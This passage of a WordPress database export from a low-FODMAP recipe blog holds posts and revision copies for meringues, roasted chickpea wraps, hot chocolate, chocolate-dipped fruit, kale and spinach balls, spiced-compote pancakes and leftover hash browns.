  1. Prepare the fruit by washing, pealing and cutting
  2. Finely chop the nuts and place in a small bowl
  3. Place the chocolate in a microwave-safe glass bowl and microwave for no more than 30 seconds initially. Stir and check the consistency. If not melted enough, microwave a few more seconds. It’s very easy to overcook chocolate so only microwave a few seconds at the time before checking the consistency
  4. Dip and turn the fruit in the melted chocolate then drizzle over the chopped nuts or desiccated coconut
  5. Let the chocolate cool in room temperature then eat and enjoy!
\n','CHRISTMAS FRUIT DIPPED IN CHOCOLATE, NUTS AND COCONUT','','publish','open','open','','christmas-fruit-dipped-in-chocolate-nuts-and-coconut','','','2020-04-06 22:33:20','2020-04-06 22:33:20','',0,'http://tummyrevolution.com/?p=4690',0,'post','',0),(4691,1,'2020-04-05 00:10:47','2020-04-05 00:10:47','\n

Meringues can look so pretty and you can have a lot of fun making them in different colours and flavours. I love the fact that they are low-FODMAP so this is a treat I can still enjoy. Meringues are also great as part of other deserts such as Eton Mess and birthday cakes. 
I have to make two birthday cakes for my twins this week and wanted to make some meringues for decoration. Now that they are a bit older they don\'t want to share a cake so I need to make two, one for my girl in pink and one for my boy in blue - very typical!
They\'ve seen some incredible cakes on Pinterest and now want me to simply whip up something similar....as you do. I am not particularly good at birthday cakes to begin with so making these three tiered cakes in ombre colours feels daunting to say the least. Let\'s hope they turn out looking reasonably ok. 

\n\n\n\n
\"\"/
\n\n\n\n

Making meringues can be a bit tricky in the best of circumstances but here in Dubai it\'s extra hard because of the humidity right now. The meringues often turn out looking fine but once you take them out of the oven and leave them for a bit, they turn sticky. Especially if you\'ve used a food colouring. I\'ve worked out that the best way to keep them crispy is to leave them in the oven for a bit longer on very low heat and then turn of the oven and leave them in there over night. When they\'ve cooled down you take them straight out of the oven and transfer them to an airtight container. You might not live in a humid climate but sometimes a rainy day can have an effect. It\'s definitely easier to make meringues on a dry day if you have the choice.

There are other challenges involved in making meringues so I\'ve put together some tips on how to improve your chances at making great meringues:

\n\n\n\n

1. Use a large, clean bowel made of glass, ceramic, or stainless steel. Plastic is not recommended as it can hold traces of oil/fat which can effect your meringues. If your bowl feels a bit oily you can wipe it using some kitchen towel and distilled vinegar. 

\n\n\n\n

2. Make sure your egg whites are at room temperature. Having said that, it\'s easier to separate the egg whites whilst the eggs are cold. A way around this is to take the eggs out of the fridge, crack the eggs on a smooth surface (not an edge) whilst cold and separate the egg whites one by one, making sure there is not egg yolk. I would recommend cracking them individually placing the egg whites into a small bowl and then transferring them into a lager bowel so that if any egg yolk gets mixed in with one, you don\'t have to throw all the egg whites away. Once you\'ve separated all the egg whites, leave them for 10-15 minutes to reach room temperature.

\n\n\n\n

4. Use the right sugar and add it slowly. The finer the sugar, the easier it will be for the sugar crystals to dissolve when whipped with the egg whites. You can use regular granulated sugar, but I tend to use caster sugar as it dissolves easier and gives your meringue mix that smooth texture you want. When adding the sugar to your egg whites, do it slowly, one tablespoon at the time to make sure the sugar dissolves. This process can take around 10-15 minutes. 

\n\n\n\n

5. Use a stabiliser. If you want your meringues a bit sturdier you can add an acidic ingredient such as white vinegar, lemon juice or cream of tartar. I find this really helps and I generally choose to use vinegar.

\n\n\n\n
\"\"/
\n\n\n\n

 I hope the tips together with this recipes will help you make absolutely perfect meringues :)

When firm, silky smooth peaks forms, your mix is ready to be piped out

Makes 10-30 meringues

\n\n\n\n

INGREDIENTS

\n\n\n\n
  • 3 egg whites (room temperature)
  • 1 tsp White vinegar
  • 180 g Caster sugar
  • 1 pinch Salt
  • 1 tsp Vanilla essence
  • food colouring (optional)
\n\n\n\n

INSTRUCTIONS
1. Preheat the oven to 120°C

\n\n\n\n

2. Take the eggs out of the fridge, crack the eggs on a smooth surface (not an edge) and separate the egg whites one by one, making sure there is not egg yolk. Place in a large, clean glass or metal bowel.  Once you\'ve separated all the egg whites, leave them for 10-15 minutes to reach room temperature.
3. Using an electric mixer, stat mixing the egg whites slowly until the egg whites start to bubble, then increase the speed and continue mixing until the egg whites turn fluffy and form soft peaks.

\n\n\n\n

4. Add the vinegar.

\n\n\n\n

5. Keep the mixer on medium speed, then start adding the sugar slowly, one tablespoon at the time to make sure the sugar dissolves. This will take about 10-15 minutes or until the mixture is smooth and form stiff peaks

\n\n\n\n

6. Add the the salt and vanilla essence until combined.
7. If you want to add colour to your meringues, add some thin strips of food colouring to your piping bag. You don\'t need very much so start with just a little bit to see how it turns out. A tip is to keep the piping bad sideways so the colour doesn\'t run out. If you don;t have a piping bag, you can use a spoon to spoon out the mixture but I wound\'t recommend using colour in that case.

\n\n\n\n

8. Pipe the meringues onto a baking tray lined with baking paper.

\n\n\n\n

9. Bake at 120°C for 50 minutes for small meringues or 60 minutes for larger meringues. If you want them crispy add on 30 minutes before removing. If you are baking meringues on a humid day or in a humid climate, turn the heat down to 50 degrees for another 30 minutes, then turn the oven of, but leave the meringues in the oven until they\'ve cooled. Immediately transfer to an airtight container.The meringues will last for about 2 weeks in an airtight containerEnjoy! 

\n','Meringues','','publish','open','open','','meringues','','','2020-04-06 22:34:45','2020-04-06 22:34:45','',0,'http://tummyrevolution.com/?p=4691',0,'post','',0),(4692,1,'2020-04-05 00:10:47','2020-04-05 00:10:47','\n

Meringues can look so pretty and you can have a lot of fun making them in different colours and flavours. I love the fact that they are low-FODMAP so this is a treat I can still enjoy. Meringues are also great as part of other deserts such as Eton Mess and birthday cakes. 
I have to make two birthday cakes for my twins this week and wanted to make some meringues for decoration. Now that they are a bit older they don\'t want to share a cake so I need to make two, one for my girl in pink and one for my boy in blue - very typical!
They\'ve seen some incredible cakes on Pinterest and now want me to simply whip up something similar....as you do. I am not particularly good at birthday cakes to begin with so making these three tiered cakes in ombre colours feels daunting to say the least. Let\'s hope they turn out looking reasonably ok. 

\n\n\n\n
\"\"/
\n\n\n\n

Making meringues can be a bit tricky in the best of circumstances but here in Dubai it\'s extra hard because of the humidity right now. The meringues often turn out looking fine but once you take them out of the oven and leave them for a bit, they turn sticky. Especially if you\'ve used a food colouring. I\'ve worked out that the best way to keep them crispy is to leave them in the oven for a bit longer on very low heat and then turn of the oven and leave them in there over night. When they\'ve cooled down you take them straight out of the oven and transfer them to an airtight container. You might not live in a humid climate but sometimes a rainy day can have an effect. It\'s definitely easier to make meringues on a dry day if you have the choice.

There are other challenges involved in making meringues so I\'ve put together some tips on how to improve your chances at making great meringues:

\n\n\n\n

1. Use a large, clean bowel made of glass, ceramic, or stainless steel. Plastic is not recommended as it can hold traces of oil/fat which can effect your meringues. If your bowl feels a bit oily you can wipe it using some kitchen towel and distilled vinegar. 

\n\n\n\n

2. Make sure your egg whites are at room temperature. Having said that, it\'s easier to separate the egg whites whilst the eggs are cold. A way around this is to take the eggs out of the fridge, crack the eggs on a smooth surface (not an edge) whilst cold and separate the egg whites one by one, making sure there is not egg yolk. I would recommend cracking them individually placing the egg whites into a small bowl and then transferring them into a lager bowel so that if any egg yolk gets mixed in with one, you don\'t have to throw all the egg whites away. Once you\'ve separated all the egg whites, leave them for 10-15 minutes to reach room temperature.

\n\n\n\n

4. Use the right sugar and add it slowly. The finer the sugar, the easier it will be for the sugar crystals to dissolve when whipped with the egg whites. You can use regular granulated sugar, but I tend to use caster sugar as it dissolves easier and gives your meringue mix that smooth texture you want. When adding the sugar to your egg whites, do it slowly, one tablespoon at the time to make sure the sugar dissolves. This process can take around 10-15 minutes. 

\n\n\n\n

5. Use a stabiliser. If you want your meringues a bit sturdier you can add an acidic ingredient such as white vinegar, lemon juice or cream of tartar. I find this really helps and I generally choose to use vinegar.

\n\n\n\n
\"\"/
\n\n\n\n

 I hope the tips together with this recipes will help you make absolutely perfect meringues :)

When firm, silky smooth peaks forms, your mix is ready to be piped out

Makes 10-30 meringues

\n\n\n\n

INGREDIENTS

\n\n\n\n
  • 3 egg whites (room temperature)
  • 1 tsp White vinegar
  • 180 g Caster sugar
  • 1 pinch Salt
  • 1 tsp Vanilla essence
  • food colouring (optional)
\n\n\n\n

INSTRUCTIONS
1. Preheat the oven to 120°C

\n\n\n\n

2. Take the eggs out of the fridge, crack the eggs on a smooth surface (not an edge) and separate the egg whites one by one, making sure there is not egg yolk. Place in a large, clean glass or metal bowel.  Once you\'ve separated all the egg whites, leave them for 10-15 minutes to reach room temperature.
3. Using an electric mixer, stat mixing the egg whites slowly until the egg whites start to bubble, then increase the speed and continue mixing until the egg whites turn fluffy and form soft peaks.

\n\n\n\n

4. Add the vinegar.

\n\n\n\n

5. Keep the mixer on medium speed, then start adding the sugar slowly, one tablespoon at the time to make sure the sugar dissolves. This will take about 10-15 minutes or until the mixture is smooth and form stiff peaks

\n\n\n\n

6. Add the the salt and vanilla essence until combined.
7. If you want to add colour to your meringues, add some thin strips of food colouring to your piping bag. You don\'t need very much so start with just a little bit to see how it turns out. A tip is to keep the piping bad sideways so the colour doesn\'t run out. If you don;t have a piping bag, you can use a spoon to spoon out the mixture but I wound\'t recommend using colour in that case.

\n\n\n\n

8. Pipe the meringues onto a baking tray lined with baking paper.

\n\n\n\n

9. Bake at 120°C for 50 minutes for small meringues or 60 minutes for larger meringues. If you want them crispy add on 30 minutes before removing. If you are baking meringues on a humid day or in a humid climate, turn the heat down to 50 degrees for another 30 minutes, then turn the oven of, but leave the meringues in the oven until they\'ve cooled. Immediately transfer to an airtight container.The meringues will last for about 2 weeks in an airtight containerEnjoy! 

\n','Meringues','','inherit','closed','closed','','4691-revision-v1','','','2020-04-05 00:10:47','2020-04-05 00:10:47','',4691,'http://tummyrevolution.com/4691-revision-v1/',0,'revision','',0),(4693,1,'2020-04-05 00:11:11','2020-04-05 00:11:11','\n

Chickpeas is one of those foods that are high in FODMAPs but the good news is that the FODMPAs can dissolve in water so canned chickpeas tend to be lower in FODMAPs as some ‘leach’ out into the canning water and are removed when they are drained and rinsed. Canned chickpeas are rated medium in FODMAPs so you can only have a little bit at the time but that\'s great because chickpeas are a good source of vitamins, minerals and fibre. They are also high in protein and can be a good substitute for meat.

\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n

A good way of getting a few daily chickpeas to your diet is to roast them. By doing this yo can add them to all sorts of dishes such as salad\'s, sandwiches and wraps or you simply eat them on their own. You can add different kinds of flavouring, both sweet and savoury to make them taste really great. I choose to use garlic infused oil, oregano and parmesan this time but you can also use spices such as paprika, cayenne pepper chilli powder, ginger, turmeric, lime. If you fancy something a bit sweeter you can use almond butter, vanilla extract or cinnamon and maybe syrup. There\'s lots of varieties to try out.

I had some of my roasted chickpeas as a snack and then I saved some for a wrap I made. They tasted so good in the wrap and gave it some crunch which I really liked.

\n\n\n\n

For the wrap I roasted some aubergine in a griddle pan and mixed chopped up peppers, tomato, cucumber, spring onion (green part only). I also made some FODMAP friendly tzatziki (will have to share that recipe soon) and I had some home made kale pesto left over that I used as well. You can also use other FODMAP friendly vegetables such as roasted courgette, pumpkin or broccoli or raw carrot, spinach, lettuce etc. Just choose your favourites and have a go at mixing them all up. I never used to think you could mix roasted vegetables with raw vegetables in a dish but I now think they can really complement each other as they have different textures and very different flavours.
I was dying to eat this wrap because I was so hungry making it and it just looked so great. It just tasted amazing to and I ate it far too quickly but I just couldn\'t stop myself. 

\n\n\n\n

Here is my recipe for roasted chickpeas. Hope you enjoy it :)

\n\n\n\n

INGREDIENTS

1 can chickpeas (400g)

\n\n\n\n

1.5 tbsp garlic infused olive oil

\n\n\n\n

1/2 tsp dried oregano

\n\n\n\n

2 tbsp grated parmesan 

\n\n\n\n

salt and pepper to taste

\n\n\n\n

INSTRUCTIONS

\n\n\n\n

1. Preheat the oven to 200 C° / 392 F°

\n\n\n\n

2. Line a baking tray with parchment paper

\n\n\n\n

3. Drain the water from the chickpeas and and place them on kitchen paper to let the moister transfer to the paper.

\n\n\n\n

4. In a medium bowl mix together the garlic infused, oregano and parmesan. Season with salt and pepper, then add the chickpeas and stir until combined.

\n\n\n\n

5. Place the chickpeas onto the baking tray and spread them out evenly 

\n\n\n\n

6. Roast for 30-40 minutes, staring 2 or 3 times.

\n\n\n\n

7. Let the chickpeas cool before removing them from the tray as it will keep them crunchy. Store in an airtight container for up to 3 days.

\n\n\n\n

Enjoy! 

\n','Wrap with Tummy Friendly roasted chickpeas','','inherit','closed','closed','','4689-revision-v1','','','2020-04-05 00:11:11','2020-04-05 00:11:11','',4689,'http://tummyrevolution.com/4689-revision-v1/',0,'revision','',0),(4694,1,'2020-04-05 00:11:32','2020-04-05 00:11:32','\n

It\'s the time of year when it get\'s dark early and all you want to do in the evening is to curl up on the sofa with a hot drink....at least that\'s me!

Having done the low-FODAP diet a few years back I discovered that milk triggered my symptoms. Initially I really missed milk because I used to really enjoy it. I used to look longingly at people having hot chocolate in cafe\'s because it looked so nice especially during the winter months. After some time I got more used to drinking alternative milks such as almond milk and I realised I could still have hot chocolate. I just need to adapt it to be low FODMAP

\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n

If you love smooth homemade hot chocolate you\'ll love this recipe. It’s great for sensitive tummies and simple to make.

The recipe is also in my new book \'Tummy Revolution, Gut health made simple\' as one of the drinks options. The book has lots of recipes for your every day needs such as breakfast, lunch, dinner, snacks and drinks to give you the choice and freedom to eat well whilst keeping your tummy happy and healthy. All recipes are low FODMAP and dietitian approved so be sure to check out the book here
 

\n\n\n\n

TUMMY FRIENDLY HOT CHOCOLATE

\n\n\n\n

Serves 1, Prep & Cook time 5-10 min, 

INGREDIENTS

\n\n\n\n

1 cup (250ml) milk such as lactose free, almond or rice milk

\n\n\n\n

2 tbsp unsweetened cacao powder

\n\n\n\n

1-2 tbsp maple syrup (or sugar)

A pinch of salt

\n\n\n\n

¼ tsp vanilla extract

\n\n\n\n

A dollop of whipped cream to serve if you wish (optional) 

\n\n\n\n

INSTRUCTIONS

\n\n\n\n
  1. Pour the milk into a small saucepan and bring to simmer over medium heat
  2. Whisk in the cacao powder until there are no lumps left
  3. Add the maple syrup, pinch of salt and vanilla extract and stir until combined
  4. Pour the hot chocolate into a mug
  5. Serve with a dollop of whipped cream if you wish
\n\n\n\n

TIP:Try adding a teaspoon of cinnamon

\n','FODMAP friendly Hot Chocolate','','publish','open','open','','fodmap-friendly-hot-chocolate','','','2020-04-06 22:33:36','2020-04-06 22:33:36','',0,'http://tummyrevolution.com/?p=4694',0,'post','',0),(4695,1,'2020-04-05 00:11:32','2020-04-05 00:11:32','\n

It\'s the time of year when it get\'s dark early and all you want to do in the evening is to curl up on the sofa with a hot drink....at least that\'s me!

Having done the low-FODAP diet a few years back I discovered that milk triggered my symptoms. Initially I really missed milk because I used to really enjoy it. I used to look longingly at people having hot chocolate in cafe\'s because it looked so nice especially during the winter months. After some time I got more used to drinking alternative milks such as almond milk and I realised I could still have hot chocolate. I just need to adapt it to be low FODMAP

\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n

If you love smooth homemade hot chocolate you\'ll love this recipe. It’s great for sensitive tummies and simple to make.

The recipe is also in my new book \'Tummy Revolution, Gut health made simple\' as one of the drinks options. The book has lots of recipes for your every day needs such as breakfast, lunch, dinner, snacks and drinks to give you the choice and freedom to eat well whilst keeping your tummy happy and healthy. All recipes are low FODMAP and dietitian approved so be sure to check out the book here
 

\n\n\n\n

TUMMY FRIENDLY HOT CHOCOLATE

\n\n\n\n

Serves 1, Prep & Cook time 5-10 min, 

INGREDIENTS

\n\n\n\n

1 cup (250ml) milk such as lactose free, almond or rice milk

\n\n\n\n

2 tbsp unsweetened cacao powder

\n\n\n\n

1-2 tbsp maple syrup (or sugar)

A pinch of salt

\n\n\n\n

¼ tsp vanilla extract

\n\n\n\n

A dollop of whipped cream to serve if you wish (optional) 

\n\n\n\n

INSTRUCTIONS

\n\n\n\n
  1. Pour the milk into a small saucepan and bring to simmer over medium heat
  2. Whisk in the cacao powder until there are no lumps left
  3. Add the maple syrup, pinch of salt and vanilla extract and stir until combined
  4. Pour the hot chocolate into a mug
  5. Serve with a dollop of whipped cream if you wish
\n\n\n\n

TIP:Try adding a teaspoon of cinnamon

\n','FODMAP friendly Hot Chocolate','','inherit','closed','closed','','4694-revision-v1','','','2020-04-05 00:11:32','2020-04-05 00:11:32','',4694,'http://tummyrevolution.com/4694-revision-v1/',0,'revision','',0),(4696,1,'2020-04-05 00:11:49','2020-04-05 00:11:49','\n

Fruit tastes great on their own but why not add some Christmas excitement by adding some chocolate and nuts. Good quality dark chocolate is good for sensitive tummies and full of antioxidants, which are important to our health. Simply choose fruit that is gut friendly such as pineapple, strawberries, Satsuma, oranges, kiwi or star fruit

\n\n\n\n

Large quantities of fruit are not good if you have a sensitive gut or if you\'re on the low FODMAP diet so stick to a small portion of FODMAP friendly fruits and you should be fine.

Here\'s a list of some other FOMDAP friendly fruits:

\n\n\n\n

Banana - Unripe (i.e green/yellow)
Dragon Fruit
Grapes
Guava
Lemon
Lime
Mandarine
Orange
Passion fruit

The list of FODMAP friendly fruits changes all the time so It\'s important to check Monash University website or the App to make sure you eat the fruits that are best for your gut.

\n\n\n\n
\"\"/
\n\n\n\n

Serves 4, Prep & Cook time 15 min 

INGREDIENTS

\n\n\n\n

5-7 strawberries

\n\n\n\n

10-15 mandarin slices (or use Clementine or Satsuma) 

5-10 pineapple triangle pieces

\n\n\n\n

100 g good quality dark chocolate

\n\n\n\n

A small handful of pecan or macadamia nuts

2 tbsp desiccated coconut (optional)

\n\n\n\n

INSTRUCTIONS

\n\n\n\n
  1. Prepare the fruit by washing, pealing and cutting
  2. Finely chop the nuts and place in a small bowl
  3. Place the chocolate in a microwave-safe glass bowl and microwave for no more than 30 seconds initially. Stir and check the consistency. If not melted enough, microwave a few more seconds. It’s very easy to overcook chocolate so only microwave a few seconds at the time before checking the consistency
  4. Dip and turn the fruit in the melted chocolate then drizzle over the chopped nuts or desiccated coconut
  5. Let the chocolate cool in room temperature then eat and enjoy!
\n','CHRISTMAS FRUIT DIPPED IN CHOCOLATE, NUTS AND COCONUT','','inherit','closed','closed','','4690-revision-v1','','','2020-04-05 00:11:49','2020-04-05 00:11:49','',4690,'http://tummyrevolution.com/4690-revision-v1/',0,'revision','',0),(4697,1,'2020-04-12 03:02:00','2020-04-12 03:02:00','\n

At Christmas we want to enjoy as much of that lovey Christmas food as we can. But if you have a sensitive gut some of that Christmas foods we eat can give us unconformable symptoms. You can easily avoid this by swapping some of these foods for more tummy friendly options. Both Brussel sprouts and ordinary stuffing can cause digestive symptoms. These Herbed Kale and Spinach balls are a great substitute for your stuffing or Brussels sprouts. I think you\'ll be surprised at how delicious they are!

\n\n\n\n
\"\"/
\n\n\n\n

You can serve them as part of your Christmas meal or you can have them as an appetiser. Everyone in my house loves them and they generally don\'t last long once I make batch. Little once tend to love them too so make sure you make plenty because they’re bound to be very popular.

\n\n\n\n

Makes 15 balls, Cook and prep time 40 min,

\n\n\n\n

INGREDIENTS

\n\n\n\n

2 cups (120g) finely chopped kale
2 cups (200g) frozen spinach, defrosted and drained (alternatively use 2 cups/150g finely chopped fresh spinach)
½ cup (or 7)  finely chopped spring onions (green part only)
5 tbsp garlic infused olive oil
2 large eggs
1 cup gluten free bread crumbs (see how to make it below)
¼ cup grated Parmesan 
½ teaspoon sea salt
½ tsp ground thyme
½ tsp dried rubbed sage
½ tsp dried rosemary
½ tsp oregano
1-2 pinches ground black pepper

\n\n\n\n

 Tip. If you can’t get hold of gluten free bread crumbs you can use gluten free toasted/dry bread or gluten free biscottate. Simply place it in a food processor  and pulse until you have the right size crumb.

\n\n\n\n

INSTRUCTIONS 

\n\n\n\n
  1. Preheat the oven to 175 C°/350 Fº and line a baking tray with parchment paper

  2. 2.Combine spinach, spring onion, garlic infused olive oil and eggs together in a large bowl. Add kale, gluten free breadcrumbs, Parmesan cheese, sea salt, thyme, sage, rosemary, oregano and black pepper. Mix well.
\n\n\n\n
  1. Form the mixture into small balls the size of a golf ball and place them on the lined baking tray.

  2. Bake in the middle of the oven for 15 minutes. Turn the balls over and bake for a further 10-15 minutes.

\n','HERBED KALE AND SPINACH BALLS','','publish','open','open','','herbed-kale-and-spinach-balls','','','2020-04-12 23:03:55','2020-04-12 23:03:55','',0,'http://tummyrevolution.com/?p=4697',0,'post','',0),(4698,1,'2020-04-12 03:05:00','2020-04-12 03:05:00','\n

Christmas is always to short so why not start a bit early by making these Pancakes making these Pancakes with a lovely Christmas spiced Compote and some macadamia nuts. It\'s easy to get hold of cranberries this time a year. For some reason we tend just to use them for cranberry sauce on the Christmas dinner table. Cranberries are actually really nice to use in other ways such as adding them to cake mixed and in salads or stews. 

I personally love pancakes so I decide to go for a cranberry, orange and strawberry compote. I find these fruits and berries complement each other really well but you could try other tummy friendly (low FODMAP) fruits and berries if you prefer.

The cinnamon and clove spices will fill your house with the scents of Christmas. So if you want to get into the Christmas spirit in your house then this is a perfect meal to get you there. I like it for breakfast or brunch bit it could easily be used as a dessert too.

\n\n\n\n
\"\"/
\n\n\n\n

All ingredients are tummy friendly and taste amazing!

\n\n\n\n

Serves two, Cook & Prep time 30 min

\n\n\n\n


INGREDIENTS

\n\n\n\n

For the pancakes

\n\n\n\n

¾ cup (90g) gluten free flour

1 cup (400 ml) lactose free milk/rice milk or almond milk

2 eggs

A pinch of salt

Butter for cooking 

\n\n\n\n

For the Christmas spiced compote

\n\n\n\n

1 orange

\n\n\n\n

1 cup cranberries

\n\n\n\n

1 cup strawberries

\n\n\n\n

1 tbsp maple syrup

\n\n\n\n

1 tbsp granulated sugar

\n\n\n\n

1 tbsp red wine or sherry
½ tsp ground cinnamon

\n\n\n\n

A dash of ground cloves or one whole clove
½ tsp vanilla extract

\n\n\n\n

INSTRUCTIONS

\n\n\n\n

Pancakes

\n\n\n\n
  1. Mix the flour and salt in a bowl
  2. Add half of the milk and mix until smooth
  3. Add the remaining milk and whisk in the eggs
  4. Heat up a pan and melt the butter
  5. Once melted, pour in a thin layer of mix and then turn the heat down. When the surface appears firm turn pancake and bake the other side. Stir the mixture before every use as the flour has a tendency to sink to the bottom of the bowl
  6. Serve with the Christmas spiced compote
\n\n\n\n


Christmas spiced fruit compote

\n\n\n\n
  1. Peel the orange, making sure you remove as much of the membrane as possible. Slice the orange into small pieces then transfer the orange pieces to a bowl. Cut the strawberries into smaller pieces and add to the orange bowl. Pour the collected juice into a measuring cup then add water to fill up to 3/4 cup measure
  2. In a small saucepan, bring the juice and water, sugar, maple syrup, red wine, cinnamon, cloves and cranberries to a boil over high heat. Then reduce to medium-low heat and let simmer for 10-15 minutes, or until thick and syrupy. Remove the pan from the heat and add the vanilla, oranges and strawberries. Stir and let cool.
\n','PANCAKES WITH CHRISTMAS SPICED FRUIT COMPOTE AND MACADAMIA NUTS','','publish','open','open','','pancakes-with-christmas-spiced-fruit-compote-and-macadamia-nuts','','','2020-04-13 01:47:50','2020-04-13 01:47:50','',0,'http://tummyrevolution.com/?p=4698',0,'post','',0),(4699,1,'2020-04-05 00:12:11','2020-04-05 00:12:11','\n

Christmas is always to short so why not start a bit early by making these Pancakes making these Pancakes with a lovely Christmas spiced Compote and some macadamia nuts. It\'s easy to get hold of cranberries this time a year. For some reason we tend just to use them for cranberry sauce on the Christmas dinner table. Cranberries are actually really nice to use in other ways such as adding them to cake mixed and in salads or stews. 

I personally love pancakes so I decide to go for a cranberry, orange and strawberry compote. I find these fruits and berries complement each other really well but you could try other tummy friendly (low FODMAP) fruits and berries if you prefer.

The cinnamon and clove spices will fill your house with the scents of Christmas. So if you want to get into the Christmas spirit in your house then this is a perfect meal to get you there. I like it for breakfast or brunch bit it could easily be used as a dessert too.

\n\n\n\n
\"\"/
\n\n\n\n

All ingredients are tummy friendly and taste amazing!

\n\n\n\n

Serves two, Cook & Prep time 30 min

\n\n\n\n


INGREDIENTS

\n\n\n\n

For the pancakes

\n\n\n\n

¾ cup (90g) gluten free flour

1 cup (400 ml) lactose free milk/rice milk or almond milk

2 eggs

A pinch of salt

Butter for cooking 

\n\n\n\n

For the Christmas spiced compote

\n\n\n\n

1 orange

\n\n\n\n

1 cup cranberries

\n\n\n\n

1 cup strawberries

\n\n\n\n

1 tbsp maple syrup

\n\n\n\n

1 tbsp granulated sugar

\n\n\n\n

1 tbsp red wine or sherry
½ tsp ground cinnamon

\n\n\n\n

A dash of ground cloves or one whole clove
½ tsp vanilla extract

\n\n\n\n

INSTRUCTIONS

\n\n\n\n

Pancakes

\n\n\n\n
  1. Mix the flour and salt in a bowl
  2. Add half of the milk and mix until smooth
  3. Add the remaining milk and whisk in the eggs
  4. Heat up a pan and melt the butter
  5. Once melted, pour in a thin layer of mix and then turn the heat down. When the surface appears firm turn pancake and bake the other side. Stir the mixture before every use as the flour has a tendency to sink to the bottom of the bowl
  6. Serve with the Christmas spiced compote
\n\n\n\n


Christmas spiced fruit compote

\n\n\n\n
  1. Peel the orange, making sure you remove as much of the membrane as possible. Slice the orange into small pieces then transfer the orange pieces to a bowl. Cut the strawberries into smaller pieces and add to the orange bowl. Pour the collected juice into a measuring cup then add water to fill up to 3/4 cup measure
  2. In a small saucepan, bring the juice and water, sugar, maple syrup, red wine, cinnamon, cloves and cranberries to a boil over high heat. Then reduce to medium-low heat and let simmer for 10-15 minutes, or until thick and syrupy. Remove the pan from the heat and add the vanilla, oranges and strawberries. Stir and let cool.
\n','PANCAKES WITH CHRISTMAS SPICED FRUIT COMPOTE AND MACADAMIA NUTS','','inherit','closed','closed','','4698-revision-v1','','','2020-04-05 00:12:11','2020-04-05 00:12:11','',4698,'http://tummyrevolution.com/4698-revision-v1/',0,'revision','',0),(4700,1,'2020-04-05 00:12:28','2020-04-05 00:12:28','\n

At Christmas we want to enjoy as much of that lovey Christmas food as we can. But if you have a sensitive gut some of that Christmas foods we eat can give us unconformable symptoms. You can easily avoid this by swapping some of these foods for more tummy friendly options. Both Brussel sprouts and ordinary stuffing can cause digestive symptoms. These Herbed Kale and Spinach balls are a great substitute for your stuffing or Brussels sprouts. I think you\'ll be surprised at how delicious they are!

\n\n\n\n
\"\"/
\n\n\n\n

You can serve them as part of your Christmas meal or you can have them as an appetiser. Everyone in my house loves them and they generally don\'t last long once I make batch. Little once tend to love them too so make sure you make plenty because they’re bound to be very popular.

\n\n\n\n

Makes 15 balls, Cook and prep time 40 min,

\n\n\n\n

INGREDIENTS

\n\n\n\n

2 cups (120g) finely chopped kale
2 cups (200g) frozen spinach, defrosted and drained (alternatively use 2 cups/150g finely chopped fresh spinach)
½ cup (or 7)  finely chopped spring onions (green part only)
5 tbsp garlic infused olive oil
2 large eggs
1 cup gluten free bread crumbs (see how to make it below)
¼ cup grated Parmesan 
½ teaspoon sea salt
½ tsp ground thyme
½ tsp dried rubbed sage
½ tsp dried rosemary
½ tsp oregano
1-2 pinches ground black pepper

\n\n\n\n

 Tip. If you can’t get hold of gluten free bread crumbs you can use gluten free toasted/dry bread or gluten free biscottate. Simply place it in a food processor  and pulse until you have the right size crumb.

\n\n\n\n

INSTRUCTIONS 

\n\n\n\n
  1. Preheat the oven to 175 C°/350 Fº and line a baking tray with parchment paper

  2. 2.Combine spinach, spring onion, garlic infused olive oil and eggs together in a large bowl. Add kale, gluten free breadcrumbs, Parmesan cheese, sea salt, thyme, sage, rosemary, oregano and black pepper. Mix well.
\n\n\n\n
  1. Form the mixture into small balls the size of a golf ball and place them on the lined baking tray.

  2. Bake in the middle of the oven for 15 minutes. Turn the balls over and bake for a further 10-15 minutes.

\n','HERBED KALE AND SPINACH BALLS','','inherit','closed','closed','','4697-revision-v1','','','2020-04-05 00:12:28','2020-04-05 00:12:28','',4697,'http://tummyrevolution.com/4697-revision-v1/',0,'revision','',0),(4701,1,'2020-04-12 03:01:00','2020-04-12 03:01:00','\n

Well, I hope you\'ve all had a lovely Christmas with lots of delicious Christmas food. I absolutely love Christmas food and I do tend to eat more of everything at Christmas. I think it\'s that one time a year when we tend to eat lots and mix a whole lot of different foods over one or two day. Sometimes it can be a bit much for sensitive tummies like mine but I\'ve leaned to avoid or eat less of certain foods such as Yorkshire pudding, stuffing and Brussel sprouts as I now know these will give me digestive problems. Well, Brussel sprouts are quite easy to avoid as I\'m not a fan of them :) I think it\'s one of those things that you either love or hate. We have both lovers and haters of Brussel sprouts in our family so they\'re always on the Christmas table for those who like and can stomach them. I tend to have lots of other tummy friendly vegetable such as broccoli, carrots and green beans. I also make my own Herbed kale and spinach balls which I have instead of ordinary stuffing. I actually think they taste better so no loss there.

If you have any great tummy friendly Christmas food substitutes, please feel free to send me an email. I love hearing what other do and use/eat.

If you\'re anything like us you end up with a lot of leftovers from your Christmas dinner, which is ideal for making these lovely, tummy friendly hash browns. You can use meat, roast potatoes and vegetable leftovers when making this quick and easy meal. Combine it with a fried egg and you have a great brunch.
It\'s a great way of using up all your leftovers and it\'s a new tasty meal.

\n\n\n\n
\"\"/
\n\n\n\n


Serves 4, Prep & Cook time 20 min, 

\n\n\n\n

INGREDIENTS

\n\n\n\n
  • 6-8 leftover boiled or roast potatoes
  • 200g leftover vegetables (choose tummy friendly vegetables such as carrots, broccoli, parsnip, swede)
  • 150g leftover roasted meat (turkey, ham, beef or lamb), shredded
  • 1 sprig rosemary, finely chopped
  • 1 tbsp finely chopped chives (optional)
  • 1-2 tsp mustard
  • 1 tbsp gluten free flour
  • 1 large egg, lightly whisked
  • 1 tbsp sunflower oil
  • Salt and pepper

    Serve with a fried egg
\n\n\n\n

INSTRUCTIONS

\n\n\n\n
  1. In a bowl, roughly mash the cold potatoes with a fork and dice the leftover vegetables you would like to use
  2. Mix in the leftover meat, mustard, rosemary, chives, egg and season with salt and pepper
  3. Heat a large frying pan on a medium to high heat and add some of the sunflower oil. Shape the mixture into messy patties and add to the frying pan. Cook on one side for a few minutes, then flip them over and cook for a few minutes on the other side. Don’t worry if they break slightly. They don’t need to be perfect
  4. Serve with a fried egg, some extra chopped chives and freshly ground pepper

